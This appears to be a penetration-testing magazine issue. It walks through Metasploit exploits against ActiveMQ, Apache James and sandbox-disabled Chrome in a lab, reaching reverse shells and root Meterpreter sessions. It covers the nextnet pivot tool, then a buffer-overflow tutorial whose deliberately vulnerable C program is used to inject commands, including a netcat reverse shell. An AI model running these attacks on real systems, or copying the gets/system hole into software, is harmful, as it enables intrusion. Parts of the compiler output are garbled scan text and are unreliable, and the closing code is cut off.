Module options (exploit/windows/http/apache_activemq_traversal_upload):

   Name       Current Setting  Required  Description
   ----       ---------------  --------  -----------
   [...]
   RHOSTS                      yes       The target host(s), range CIDR identifier, or hosts file with syntax 'file:<path>'
   RPORT      8161             yes       The target port (TCP)
   SSL        false            no        Negotiate SSL/TLS for outgoing connections
   TARGETURI  /                yes       [...]
   [...]

Payload options:

   Name   Current Setting  Required  Description
   ----   ---------------  --------  -----------
   LHOST                   yes       The listen address (an interface may be specified)
   LPORT  4444             yes       The listen port

msf5 exploit(windows/http/apache_activemq_traversal_upload) > set rhosts 192.168.36.1
rhosts => 192.168.36.1
msf5 exploit(windows/http/apache_activemq_traversal_upload) > set lhost 192.168.36.130
lhost => 192.168.36.130
msf5 exploit(windows/http/apache_activemq_traversal_upload) > run

[*] Started reverse TCP handler on 192.168.36.130:4444
[...]
[*] Command shell session 1 opened (192.168.36.130:4444 -> 192.168.36.1:54051) at [...]

Microsoft Windows [Version 10.0.18362.778]
(c) 2019 Microsoft Corporation. All rights reserved.

C:\Users\nspadm\Downloads\apache-activemq-5.11.1-bin\apache-activemq-5.11.1>

Note that we tested this with the latest antivirus updates and with Windows Defender ON.
Apache James File Write Exploit Module
TARGET: Apache James 2.3 TYPE: Remote FIREWALL: Not Applicable

Apache James is an open source SMTP and POP3 mail server written entirely in Java. It can also be used as an NNTP news server. Version 2.3.2 has an input validation vulnerability in the code that creates new users: the username is used as a directory name without sanitisation, so a username containing directory traversal sequences makes James store that user's mail in an arbitrary directory, for example /etc/cron.d or /etc/bash_completion.d, where the message body is later executed. This module exploits the flaw by creating a user with a directory traversal payload as the username and then mailing the command stager to it. We have tested this module on a CentOS target. Let's see how to install Apache James 2.3.2 on the target.
On the CentOS terminal, install bash-completion, Java and nmap-ncat as shown below.
[root@localhost ~]# yum install bash-completion java-1.8.0-openjdk nmap-ncat
Loaded plugins: fastestmirror
Loading mirror speeds from cached hostfile
 * base: [...]
 * extras: mirrors.piconets.webwerks.in
 * updates: [...]
Resolving Dependencies
--> Running transaction check
[...]
---> Package java-1.8.0-openjdk-headless.x86_64 1:1.8.0.242.b08-0.el7_7 will be an update
--> Finished Dependency Resolution

Dependencies Resolved

==========================================================================
 Package                          Arch    Version                   Repository  Size
==========================================================================
[...]
 java-1.8.0-openjdk               x86_64  1:1.8.0.242.b08-0.el7_7   updates     293 k
Updating for dependencies:
 java-1.8.0-openjdk-headless      x86_64  1:1.8.0.242.b08-0.el7_7   updates     [...]

Transaction Summary
==========================================================================
Upgrade  1 Package (+1 Dependent package)

Total download size: 32 M
Is this ok [y/d/N]: y

The installation should finish as shown below.

[...]
Updated:
  java-1.8.0-openjdk.x86_64 1:1.8.0.242.b08-0.el7_7
Dependency Updated:
  java-1.8.0-openjdk-headless.x86_64 1:1.8.0.242.b08-0.el7_7

Complete!
[root@localhost ~]#
Bash completion is a bash feature that auto-completes commands or arguments when users type them partially. It is much like Google's autocomplete, but for the bash shell, and it is normally installed to make work at the shell faster. It matters here because its completion scripts in /etc/bash_completion.d are sourced whenever a user logs in, which is what one of this module's targets relies on.
Next, use curl to download the vulnerable version of Apache James. The command is shown below.

[root@localhost ~]# curl -O https://archive.apache.org/dist/james/server/apache-james-2.3.2.tar.gz
  % Total    % Received % Xferd  Average Speed   Time    Time     Time  Current
                                 Dload  Upload   Total   Spent    Left  Speed
100 7476k  100 7476k    0     0  [...]      0  [...]  [...]  [...]  [...]
[root@localhost ~]#

Once the download is finished, extract the archive and copy the entire extracted directory to the /opt directory. Then make the scripts in /opt/james-2.3.2/bin/*.sh executable. Then open the ports James needs in the firewall (4555 is its remote administration port, shown below) and reload the firewall.

[root@localhost ~]# tar -xzf apache-james-2.3.2.tar.gz
[root@localhost ~]# cp -r james-2.3.2 /opt
[root@localhost ~]# chmod +x /opt/james-2.3.2/bin/*.sh
[root@localhost ~]# firewall-cmd --add-port=4555/tcp --permanent
success
[root@localhost ~]# firewall-cmd --reload
success
[root@localhost ~]#

Then create a systemd unit for James in /etc/systemd/system (the unit file itself is not legible in the source) and enable the service, disabling postfix so that it does not hold port 25.

[root@localhost ~]# cd /etc/systemd/system
[root@localhost system]# sudo systemctl enable james
Created symlink from /etc/systemd/system/multi-user.target.wants/james.service to /etc/systemd/system/james.service.
[root@localhost system]# sudo systemctl disable postfix
Removed symlink /etc/systemd/system/multi-user.target.wants/postfix.service.
[root@localhost system]#
Now start Metasploit and load the apache_james_exec module.

msf5 > use exploit/linux/smtp/apache_james_exec
msf5 exploit(linux/smtp/apache_james_exec) > show options

Module options (exploit/linux/smtp/apache_james_exec):

   Name      Current Setting  Required  Description
   ----      ---------------  --------  -----------
   PASSWORD  root             yes       [...] James remote administration tool
   RHOSTS                     yes       The target host(s), range CIDR identifier, or hosts file with syntax 'file:<path>'
   RPORT     25               yes       The target port (TCP)
   SRVHOST   0.0.0.0          yes       The local host or network interface to listen on
   SRVPORT   8080             yes       The local port to listen on
   SSL       false            no        Negotiate SSL for incoming connections
   SSLCert                    no        Path to a custom SSL certificate (default is randomly generated)
   URIPATH                    no        The URI to use for this exploit (default is random)
   USERNAME  root             yes       [...] James remote administration tool

Exploit target:

   Id  Name
   --  ----
   0   Bash Completion
   1   Cron

There are two ways to trigger the payload: via a bash completion script, which runs when a user logs in, or via a cron.d entry, which cron runs on its own.
We will try the cron method first. Set the required options as shown below and run check.

msf5 exploit(linux/smtp/apache_james_exec) > set rhosts 192.168.36.140
rhosts => 192.168.36.140
msf5 exploit(linux/smtp/apache_james_exec) > set payload linux/x64/meterpreter/reverse_tcp
payload => linux/x64/meterpreter/reverse_tcp
msf5 exploit(linux/smtp/apache_james_exec) > set lhost 192.168.36.130
lhost => 192.168.36.130
msf5 exploit(linux/smtp/apache_james_exec) > set target 1
target => 1
msf5 exploit(linux/smtp/apache_james_exec) > check

[*] 192.168.36.140:25 - [...]
[*] 192.168.36.140:25 - Failed to remove payload message for user '[...]/../../../etc/cron.d' with password '[...]'
Running the module should give us a Meterpreter session, as shown below.

msf5 exploit(linux/smtp/apache_james_exec) > run

[*] Started reverse TCP handler on 192.168.36.130:4444
[*] 192.168.36.140:25 - Command Stager progress - 100.00% done (833/833 bytes)
[*] 192.168.36.140:25 - Waiting for cron to execute payload
[*] Sending stage (3012516 bytes) to 192.168.36.140
[*] Meterpreter session 1 opened (192.168.36.130:4444 -> 192.168.36.140:33470) at [...]

meterpreter > sysinfo
Computer     : localhost.localdomain
OS           : CentOS 7 (Linux [...])
Architecture : x64
BuildTuple   : x86_64-linux-musl
Meterpreter  : x64/linux
meterpreter > getuid
Server username: uid=0, gid=0, euid=0, egid=0
meterpreter > background
[*] Backgrounding session 1...
msf5 exploit(linux/smtp/apache_james_exec) > set target 0
target => 0
msf5 exploit(linux/smtp/apache_james_exec) > run

[*] 192.168.36.140:25 - Command Stager progress - 100.00% done (833/833 bytes)
[!] 192.168.36.140:25 - You need to start your handler: 'handler -H 192.168.36.130 -P 4444 -p linux/x64/meterpreter/reverse_tcp'
[!] 192.168.36.140:25 - Run 'rm -f /etc/bash_completion.d/[...]' on the target to fully clean up exploit artifacts
[*] Exploit completed, but no session was created.
msf5 exploit(linux/smtp/apache_james_exec) >

With the Bash Completion target the module does not wait for a session, because the payload only runs when a user logs in. So for this target you need to start a listener yourself, as shown below.
msf5 exploit(linux/smtp/apache_james_exec) > use exploit/multi/handler
msf5 exploit(multi/handler) > set payload linux/x64/meterpreter/reverse_tcp
payload => linux/x64/meterpreter/reverse_tcp
msf5 exploit(multi/handler) > set lhost 192.168.36.130
lhost => 192.168.36.130
msf5 exploit(multi/handler) > run -j
[*] Exploit running as background job 0.
[*] Started reverse TCP handler on 192.168.36.130:4444
You will get a session only when a user logs into the target, as that is what triggers the payload. So once you restart the target system (or a user logs in), you will get another shell, as shown below.

[*] Sending stage (3012516 bytes) to 192.168.36.140
[*] Meterpreter session 2 opened (192.168.36.130:4444 -> 192.168.36.140:33572) at 2020-04-23 14:27:06 +0530

msf5 exploit(multi/handler) > sessions -l

Active sessions
===============

  Id  Name  Type                   Information                                     Connection
  --  ----  ----                   -----------                                     ----------
  1         meterpreter x64/linux  uid=0, gid=0, euid=0, egid=0 @ localhost.lo...  192.168.36.130:4444 -> 192.168.36.140:33470 (192.168.36.140)
  2         meterpreter x64/linux  uid=0, gid=0, euid=0, egid=0 @ localhost.lo...  192.168.36.130:4444 -> 192.168.36.140:33572 (192.168.36.140)

TARGET: Google Chrome 73.0.3683.86 (64 bit) TYPE: Remote FIREWALL: ON
This and the next two exploit modules remind me of the days when I used to download torrents. For specific files we downloaded, the uploaders used to provide a particular browser and suggest we use only that browser. If our readers don't see the point yet, you will by the end of this exploit module.

The above mentioned Chrome version suffers from an out-of-bounds write in its JavaScript engine. The exploit corrupts the length of a float array in order to modify the backing store of a typed array. With that, the typed array can be used to read and write arbitrary memory. The exploit then uses WebAssembly to allocate a region of RWX memory, which is then overwritten with the payload.

A typed array is a JavaScript object whose elements live in a raw backing buffer; once its length or backing pointer is corrupted, script can read and write far beyond that buffer. RWX memory is memory that is readable, writable and executable at the same time. WebAssembly code is JIT-compiled into such a region, and the module overwrites it with its payload, which is then executed.

However, this exploit only works when Chrome's sandbox is disabled. It may be upgraded to bypass the sandbox at some point. It works on any operating system (Linux, macOS and Windows) given the matching payload. While testing we found that this exploit does not work reliably on Windows 10, so this article tests it on Windows 7 64 bit. Let's test it. Download the vulnerable version of Google Chrome from our repository and install it on Windows 7 with the internet disconnected (otherwise Chrome will update itself automatically).

Once Chrome is successfully installed, it's time to disable its sandbox. Right-click the Chrome shortcut on the desktop, click "Properties" and append --no-sandbox to the Target field, as shown below.

Sandboxing is a security mechanism that runs a program, or part of it, in an isolated environment with restricted privileges, so that a compromise of that code cannot directly damage the rest of the system. Chrome runs each renderer, the process that parses pages and runs JavaScript, inside such a sandbox. That is why all three modules here need --no-sandbox: a renderer bug alone only gives code execution inside the sandbox, and a real attack chain needs a second, sandbox-escape vulnerability to reach the operating system.

OK. All set on the target system. Now load the chrome_array_map exploit.
msf5 > use exploit/multi/browser/chrome_array_map
msf5 exploit(multi/browser/chrome_array_map) > show options

Module options (exploit/multi/browser/chrome_array_map):

   Name     Current Setting  Required  Description
   ----     ---------------  --------  -----------
   SRVHOST  0.0.0.0          yes       The local host or network interface to listen on. This must be an address on the local machine or 0.0.0.0 to listen on all addresses.
   SRVPORT  8080             yes       The local port to listen on.
   SSL      false            no        Negotiate SSL for incoming connections
   SSLCert                   no        Path to a custom SSL certificate (default is randomly generated)
   URIPATH                   no        The URI to use for this exploit (default is random)

Set the required options and run the module. This starts a listener, as shown below.

msf5 exploit(multi/browser/chrome_array_map) > set payload windows/x64/meterpreter/reverse_tcp
payload => windows/x64/meterpreter/reverse_tcp
msf5 exploit(multi/browser/chrome_array_map) > set lhost 172.28.128.3
lhost => 172.28.128.3
msf5 exploit(multi/browser/chrome_array_map) > run
[*] Exploit running as background job 0.
[*] Exploit completed, but no session was created.

[*] Started reverse TCP handler on 172.28.128.3:4444
[*] Using URL: http://172.28.128.3:8080/
[*] Server started.

From the target system's Chrome browser, open the URL where our listener has been started. As soon as this is done, you should get a Meterpreter session, as shown below.

[*] 172.28.128.14  chrome_array_map - Sending exploit (user agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/73.0.3683.86 Safari/537.36)
[*] Sending stage ([...] bytes) to 172.28.128.14
[*] Meterpreter session 1 opened (172.28.128.3:4444 -> 172.28.128.14:49164) at [...]
Google Chrome Sideeffect Confusion --no-sandbox Module

This module exploits a type confusion vulnerability in Google Chrome 80.0.3987.87 (64 bit), CVE-2020-6418, in V8's handling of side effects in JSCreate. Exploiting it corrupts the length of a float array (float_rel), which gives out-of-bounds read and write on adjacent memory. That relative read and write is then used to modify a Uint64Array, which in turn is used for reading and writing absolute memory. Then the exploit uses WebAssembly to allocate a region of RWX memory, which is replaced with the payload shellcode.

However, this exploit also works only when Chrome's sandbox is disabled; it may be upgraded to bypass the sandbox at some point. Although it should work on any operating system (Linux, macOS and Windows), we have tested it on Windows 7. It should work fine on Windows 10 too.

Let's test it. Download the vulnerable version of Google Chrome from our repository, install it on Windows 7 with the internet disconnected (otherwise Chrome will update itself automatically), and disable the sandbox using the same process as in the module above. OK. All set on the target system. Now start Metasploit and load the chrome_jscreate_sideeffect exploit.
msf5 > use exploit/multi/browser/chrome_jscreate_sideeffect
msf5 exploit(multi/browser/chrome_jscreate_sideeffect) > show options

Module options (exploit/multi/browser/chrome_jscreate_sideeffect):

   Name     Current Setting  Required  Description
   ----     ---------------  --------  -----------
   SRVHOST  0.0.0.0          yes       The local host or network interface to listen on. This must be an address on the local machine or 0.0.0.0 to listen on all addresses.
   SRVPORT  8080             yes       The local port to listen on.
   SSL      false            no        Negotiate SSL for incoming connections
   SSLCert                   no        Path to a custom SSL certificate (default is randomly generated)
   URIPATH                   no        The URI to use for this exploit (default is random)

Set the payload and the other required options and run the module. This starts a listener at the address shown below.

msf5 exploit(multi/browser/chrome_jscreate_sideeffect) > set payload windows/x64/meterpreter/reverse_tcp
payload => windows/x64/meterpreter/reverse_tcp
msf5 exploit(multi/browser/chrome_jscreate_sideeffect) > set lhost 172.28.128.3
lhost => 172.28.128.3
msf5 exploit(multi/browser/chrome_jscreate_sideeffect) > run
[*] Exploit running as background job 0.
[*] Exploit completed, but no session was created.

[*] Started reverse TCP handler on 172.28.128.3:4444
[+] Using URL: http://172.28.128.3:8080/
[*] Server started.

From the target system's Chrome browser, go to the URL highlighted above. As soon as this is done, you should get a Meterpreter session, as shown below.

[*] 172.28.128.14  chrome_jscreate_sideeffect - Sending exploit (user agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/80.0.3987.87 Safari/537.36)
[*] Sending stage ([...] bytes) to 172.28.128.14
[+] Meterpreter session 1 opened (172.28.128.3:4444 -> 172.28.128.14:49168) at [...]
Here is another exploit for Google Chrome. Versions before 70 suffer from a type confusion vulnerability in Chrome's JIT compiler (CVE-2018-17463). Object.create is used to cause a type confusion between a PropertyArray and a NameDictionary. This is built into an arbitrary read/write memory primitive, which is then used to write shellcode into the RWX region of a WebAssembly object.

However, this exploit too only works when Chrome's sandbox is disabled; it may be upgraded to bypass the sandbox at some point. It works on any operating system (Linux, macOS and Windows). While testing we found that it does not work reliably on Windows 10, so this article tests it on Windows 7 64 bit.

Let's test it. Download the vulnerable version of Google Chrome from our repository and install it on Windows 7 with the internet disconnected (otherwise Chrome will update itself automatically). Once Chrome is successfully installed, disable the sandbox as already seen. Now start Metasploit and load the chrome_object_create exploit.
msf5 > use exploit/multi/browser/chrome_object_create
msf5 exploit(multi/browser/chrome_object_create) > show options

Module options (exploit/multi/browser/chrome_object_create):

   Name     Current Setting  Required  Description
   ----     ---------------  --------  -----------
   SRVHOST  0.0.0.0          yes       The local host or network interface to listen on. This must be an address on the local machine or 0.0.0.0 to listen on all addresses.
   SRVPORT  8080             yes       The local port to listen on.
   SSL      false            no        Negotiate SSL for incoming connections
   SSLCert                   no        Path to a custom SSL certificate (default is randomly generated)
   URIPATH                   no        The URI to use for this exploit (default is random)

Set the payload and the other required options and run the module. This starts a listener at the URL shown below.

msf5 exploit(multi/browser/chrome_object_create) > set payload windows/x64/shell/reverse_tcp
payload => windows/x64/shell/reverse_tcp
msf5 exploit(multi/browser/chrome_object_create) > set lhost 172.28.128.3
lhost => 172.28.128.3
msf5 exploit(multi/browser/chrome_object_create) > set uripath hcool
uripath => hcool
msf5 exploit(multi/browser/chrome_object_create) > set lport 4455
lport => 4455
msf5 exploit(multi/browser/chrome_object_create) > run
[*] Exploit running as background job 0.
[*] Exploit completed, but no session was created.

[*] Started reverse TCP handler on 172.28.128.3:4455
[*] Using URL: http://172.28.128.3:8080/hcool
[*] Server started.

From the target system's Chrome browser, go to the URL highlighted above. As soon as this is done, you should get a command shell, as shown below.

[*] 172.28.128.14  chrome_object_create - Sending exploit (user agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/69.0.3497.1[...] Safari/537.36)
[*] Sending stage ([...] bytes) to 172.28.128.14
[*] Command shell session 1 opened (172.28.128.3:4455 -> 172.28.128.14:49159) at [...]

msf5 exploit(multi/browser/chrome_object_create) > sessions -l

Active sessions
===============

  Id  Name  Type               Information  Connection
  --  ----  ----               -----------  ----------
  1         shell x64/windows               172.28.128.3:4455 -> 172.28.128.14:49159 (172.28.128.14)

msf5 exploit(multi/browser/chrome_object_create) > sessions -i 1
[*] Starting interaction with 1...

Microsoft Windows [Version 6.1.[...]]
Copyright (c) 2009 Microsoft Corporation.  All rights reserved.

C:\[...]>

That's all in Metasploit This Month for this Issue. We will be back with some more awesome modules in our next Issue.
TOOL OF THE MONTH

Kali Linux 2020.2 has been released and its makers have added a new tool named nextnet. Nextnet is a pivot point discovery tool. We have not yet covered pivoting in our magazine, but we will soon. Until then, here is a brief introduction. First, three kinds of host: single-homed, dual-homed and multi-homed. A single-homed host has a single network interface. Our readers have seen lots of these (most of our CTF machines: when we boot a CTF machine it is allotted a single network interface). A dual-homed host has two network interfaces (see the Metasploitable tutorials of this Issue). As our readers might have guessed, a multi-homed host has multiple network interfaces. A host with interfaces on two networks is a pivot point: compromising it gives an attacker a path into the second network, which is why such hosts are worth finding early in an engagement.

So nextnet is a tool that helps penetration testers detect hosts with more than one network interface. It sends NetBIOS name service probes (UDP port 137) across the range and parses the replies, which list every address the responding host has, including addresses on networks the scanner cannot reach directly. This is how it works.
hackercoolmagz@kali $ ./nextnet 172.28.128.0/24
{"host":"172.28.128.1", ..., "proto":"udp", "probe":"...", ..., "nets":["192.168.36.1","192.168.160.1","19..."], ...}
[the rest of the JSON record printed by nextnet is not legible in the scan]
We can see that nextnet here found a system with IP 172.28.128.1 which is multi homed, along with its IP addresses in the other networks. We will see pivoting in our next Issue.
BUFFER OVERFLOW
Do you remember the new directory named "C" we created in our previous Issue to demonstrate the tool GNU Debugger? I want you to go again into that directory and code another C program as shown below. You can aptly name it second.c.
#include <stdio.h>
#include <stdlib.h>

char *gets(char *s); /* not declared by modern headers; declared here so the program still builds */

int main(void)
{
    char *sh_name;
    char *command;
    sh_name = (char *)malloc(10);     /* 10-byte buffer for the answer */
    command = (char *)malloc(128);    /* 128-byte buffer the program never writes to */
    printf("Name which superhero you want to be:");
    gets(sh_name);                    /* unbounded read: the bug this article is about */
    printf("Hello %s\n", sh_name);
    system(command);                  /* runs whatever ended up in the command buffer */
    return 0;
}
After you finish coding it, compile the second.c program as shown below.
magz@kali:~/C$ gcc second.c -g rr)
In function ‘main
vette acest iM iast im Caan
eC
Pu sti Ce ste ac sun aT essu mice
include ‘’ or provide a declaratio ‘malloc’
mare)
ACL eC)
CI Raise este eet mast
a )
oc
esta ae eum ae as (METhe compilation should pop up many warnings. But as it is said, programmers worry about
errors and not warnings. So for now just ignore the warnings. Now let me explain what this pr
ogram does.
This program is one of the popular programs used to demonstrate buffer overflow. We have introduced some modifications to it. Externally, it is a simple program which asks users which superhero they want to be and prints it back, as shown below.
hackercoolmagz@kali:~/C$ ./second
Name which superhero you want to be:Captain America
Hello Captain America
hackercoolmagz@kali:~/C$ ./second
Name which superhero you want to be:Iron Man
Hello Iron Man
Now let me explain the internal code of this program line by line. Let's jump directly to the two declarations in which we created two character pointers, 'sh_name' and 'command'. The asterisk symbol signifies a pointer to a char variable. We use this when we have no idea what length the string is going to be. Next come two calls to the C function "malloc", which is used to allocate memory during runtime. As you can see, it allocates memory of 10 and 128 bytes to 'sh_name' and 'command' respectively. To put it simply, I have created two buffers here, one of 10 bytes and the other of 128 bytes.
Seeing where we are getting to? Next, the program prints the text asking who your superhero is and collects user input using the "gets" function, which reads a line from the standard input and stores it as a C string. The following line prints it back, prepended with "Hello", as we have already seen in the image above. The last line of the C program has the 'system' function, which passes commands to the command processor to be executed. I hope you understood the function of this program.
Now suppose a user ran the program and, when prompted for his favorite superhero, answered as shown below. Maybe he was a diehard (to the power of 7) fan of Captain America like me, or he was an English language perfectionist who hated giving minimal answers. Whatever the user was, the program responded as shown below. It printed out the answer, but it also printed something else: "he: not found" with a 'sh' at the beginning.
hackercoolmagz@kali:~/C$ ./second
Name which superhero you want to be:[a long answer about Captain America; not legible in the scan]
Hello ...
sh: 1: he: not found
sh is a command language interpreter that executes commands from the standard input. This is a BUG. Say it once again loudly: "a BUG". The program is sent to the testers to find out what the bug can do.
The testers load the program using GNU Debugger, about which our readers have learnt in our previous Issue.
hackercoolmagz@kali:~/C$ gdb ./second
GNU gdb (Debian 8.2.1-2) 8.2.1
Copyright (C) 2018 Free Software Foundation, Inc.
License GPLv3+: GNU GPL version 3 or later <http://gnu.org/licenses/gpl.html>
This is free software: you are free to change and redistribute it.
There is NO WARRANTY, to the extent permitted by law.
Type "show copying" and "show warranty" for details.
This GDB was configured as "x86_64-linux-gnu".
Type "show configuration" for configuration details.
For bug reporting instructions, please see:
<http://www.gnu.org/software/gdb/bugs/>.
Find the GDB manual and other documentation resources online at:
    <http://www.gnu.org/software/gdb/documentation/>.

For help, type "help".
Type "apropos word" to search for commands related to "word"...
Reading symbols from ./second...done.
Let us see the assembly code of the program.
(gdb) disass main
Dump of assembler code for function main:
   0x0000000000001165 <+0>:     push   %rbp
   0x0000000000001166 <+1>:     mov    %rsp,%rbp
   0x0000000000001169 <+4>:     sub    $0x10,%rsp
   ...
   0x0000000000001172 <+13>:    callq  0x1060
   0x0000000000001177 <+18>:    ...
   0x000000000000117b <+22>:    ...
   0x0000000000001180 <+27>:    callq  0x1060
   ...
   0x0000000000001190 <+43>:    ...
   ...                          callq  0x1040
   ...
   0x000000000000119e <+57>:    mov    %rax,%rdi
   ...
   0x00000000000011ab <+70>:    mov    -0x8(%rbp),%rax
   ...
   0x00000000000011c7 <+98>:    ...
   ...
End of assembler dump.
[the mnemonics of the remaining instructions are not legible in the scan]
In the assembly code, you can see that there is a call to "gets" that collects data from standard input. Introduce a breakpoint at the point shown below and run the program. With the breakpoint, the program stops running exactly at the point where you give input to the program. After giving input, you can continue the program as shown below.
(gdb) break 10
Breakpoint 1 at 0x11ab: file second.c, line 10.
(gdb) run
Starting program: /home/hackercoolmagz/C/second
Name which superhero you want to be:CCCCCCCCCCCCCCCC

Breakpoint 1, main () at second.c:10
10        printf("Hello %s\n",sh_name);
(gdb) c
Continuing.
Hello CCCCCCCCCCCCCCCC
[Detaching after vfork from child process ...]
[Inferior 1 (process 1425) exited normally]
(gdb)
If you have observed in the above image, I have given 16 C's as input. This process is known as fuzzing. Fuzzing is a process where we provide strings of varying length as input to find out where the buffer overflow occurs.
These strings of different lengths can be created in various ways. Here's a method to create C's of varied lengths using Python.
hackercoolmagz@kali:~/C$ python -c "print 'C'*16"
CCCCCCCCCCCCCCCC
[the same command with other multipliers gives strings of other lengths]
We can also directly provide this generated text to the program as shown below, instead of copying and pasting it.
hackercoolmagz@kali:~/C$ python -c "print 'C'*16" | ./second
Name which superhero you want to be:Hello CCCCCCCCCCCCCCCC
hackercoolmagz@kali:~/C$ python -c "print 'C'*...
The program running with 24 C's and then 32 C's as input:
(gdb) run
Starting program: /home/hackercoolmagz/C/second
Name which superhero you want to be:CCCCCCCCCCCCCCCCCCCCCCCC

Breakpoint 1, main () at second.c:10
10        printf("Hello %s\n",sh_name);
(gdb) c
Continuing.
Hello CCCCCCCCCCCCCCCCCCCCCCCC
[Detaching after vfork from child process 1447]
[Inferior 1 (process ...) exited normally]
(gdb) run
Starting program: /home/hackercoolmagz/C/second
Name which superhero you want to be:CCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCC

Breakpoint 1, main () at second.c:10
10        printf("Hello %s\n",sh_name);
(gdb) c
Continuing.
Hello CCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCC
With a few more C's, the characters have flowed over their buffer onto the next one, as the following run shows.
(gdb) run
Starting program: /home/hackercoolmagz/C/second
Name which superhero you want to be:CCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCC

Breakpoint 1, main () at second.c:10
10        printf("Hello %s\n",sh_name);
(gdb) c
Continuing.
Hello CCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCC
[Detaching after vfork from child process 1453]
sh: 1: CCC: not found
[Inferior 1 (process ...) exited with code ...]
(gdb)
So the size of the first buffer is 35-3 = 32 characters. Anything that goes over these 32 characters onto the next buffer is executed as a command, due to the system() function there. So next, give 32 C's and then append a command "ls" to them as shown below.
(gdb) run
Starting program: /home/hackercoolmagz/C/second
Name which superhero you want to be:CCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCls

Breakpoint 1, main () at second.c:10
10        printf("Hello %s\n",sh_name);
(gdb) c
Continuing.
Hello CCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCls
[Detaching after vfork from child process 1455]
[directory listing of /home/hackercoolmagz/C follows]
(gdb) run
Starting program: /home/hackercoolmagz/C/second
Name which superhero you want to be:lsCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCC

Breakpoint 1, main () at second.c:10
10        printf("Hello %s\n",sh_name);
(gdb) c
Continuing.
Hello lsCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCC
[Detaching after vfork from child process 1461]
sh: 1: CC: not found
[Inferior 1 (process ...) exited with code ...]
(gdb) run
Starting program: /home/hackercoolmagz/C/second
Name which superhero you want to be:CCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCuname -a

Breakpoint 1, main () at second.c:10
10        printf("Hello %s\n",sh_name);
(gdb) c
Continuing.
Hello CCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCuname -a
[Detaching after vfork from child process 1464]
Linux kali 4.19.0-kali3-amd64 #1 SMP Debian 4.19.28-2kali1 (2019-03-18) x86_64 GNU/Linux
[Inferior 1 (process ...) exited normally]
(gdb)
You can even pop a raw shell to another machine, as shown below. First start a listener on the other machine, then give 32 C's followed by the netcat command as the answer.
hackercoolmagz@kali:~$ nc -lvp 1234
listening on [any] 1234 ...
(gdb) run
Starting program: /home/hackercoolmagz/C/second
Name which superhero you want to be:CCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCnc 192.168.3...
[the rest of the command is cut off in the screenshot]

Breakpoint 1, main () at second.c:10
10        printf("Hello %s\n",sh_name);
(gdb) c
Continuing.
Hello CCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCnc 192.168.3...
[Detaching after vfork from child process 1505]
hackercoolmagz@kali:~$ nc -lvp 1234
listening on [any] 1234 ...
connect to [192.168.36.128] from (UNKNOWN) [192.168.36.130] 57080
That's all for now. To add more fun, go to your "second.c" program and add some additional lines as highlighted below. These are print commands.
#include <stdio.h>
#include <stdlib.h>

char *gets(char *s); /* not declared by modern headers; declared here so the program still builds */

int main(void)
{
    char *sh_name;
    char *command;
    sh_name = (char *)malloc(10);
    command = (char *)malloc(128);
    /* the three added lines: print both buffer addresses and the distance between them */
    printf("address of superhero name is: %p\n", (void *)sh_name);
    printf("address of command is: %p\n", (void *)command);
    printf("Difference between address is: %ld\n", (long)(command - sh_name));
    printf("Name which superhero you want to be:");
    gets(sh_name);
    printf("Hello %s\n", sh_name);
    system(command);
    return 0;
}
Compile again and now run the program. You should see something as shown below. Observed the difference?
[Screenshot: the modified program run a few times. Each run prints the address of the superhero name buffer, the address of the command buffer and the difference between the two, followed by the usual prompt; the last run again passes 32 C's followed by a command.]
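To tie the three pieces of the walkthrough together (the fuzzing lengths, the 35-3 = 32 boundary and the address difference), here is an added example that is not part of the magazine's code. It models the layout second.c ends up with in a fixed array, with the command buffer 32 bytes after the name buffer (the distance measured above, assumed here as a constant rather than taken from the real heap), and reproduces the unbounded read, the length-probing loop and a bounded read that stops the spill, without ever calling system(). Every function and constant name in it is invented for the example; live_malloc_distance() only reports what your own allocator does.

```c
/* Added example, not code from the magazine. It models the heap layout that
 * second.c ends up with: a 10-byte name buffer whose chunk is followed
 * 32 bytes later by the 128-byte command buffer (32 is the distance the
 * article measures; it comes from glibc's x86-64 chunk rounding and is
 * hard-coded here as an assumption). With that layout it shows the three
 * things the article does by hand: an unbounded gets()-style read, the
 * fuzzing loop that finds the length at which input first reaches the next
 * buffer, and the bounded read that stops it. No command is ever executed. */
#include <stdint.h>
#include <stdio.h>
#include <stdlib.h>
#include <string.h>

#define NAME_ALLOC   10   /* malloc(10) in second.c */
#define CMD_ALLOC    128  /* malloc(128) in second.c */
#define CHUNK_STRIDE 32   /* observed distance between the two buffers */

/* Stand-in for the heap: name at offset 0, command at CHUNK_STRIDE. */
typedef struct { char bytes[CHUNK_STRIDE + CMD_ALLOC]; } model_heap;

static void  model_init(model_heap *h)    { memset(h->bytes, 0, sizeof h->bytes); }
static char *model_name(model_heap *h)    { return h->bytes; }
static char *model_command(model_heap *h) { return h->bytes + CHUNK_STRIDE; }

/* Builds the article's inputs: `count` C's followed by `suffix`
 * (e.g. 32 C's then "ls"). Static storage, clipped to the model size. */
static const char *make_input(size_t count, const char *suffix) {
    static char buf[CHUNK_STRIDE + CMD_ALLOC];
    size_t room = sizeof buf - 1;
    if (count > room) count = room;
    memset(buf, 'C', count);
    buf[count] = '\0';
    strncat(buf, suffix, room - count);
    return buf;
}

/* What gets(sh_name) does: copy the whole line with no bound. Returns the
 * contents of the command buffer, i.e. what second.c would hand to system(). */
const char *command_after_unsafe(size_t count, const char *suffix) {
    static model_heap h;
    model_init(&h);
    strcpy(model_name(&h), make_input(count, suffix));
    return model_command(&h);
}

/* The fuzzing step: try lengths step, 2*step, ... up to max_len and return
 * the first one at which the command buffer is no longer empty (0 if none). */
size_t first_spilling_length(size_t step, size_t max_len) {
    for (size_t len = step; len <= max_len; len += step)
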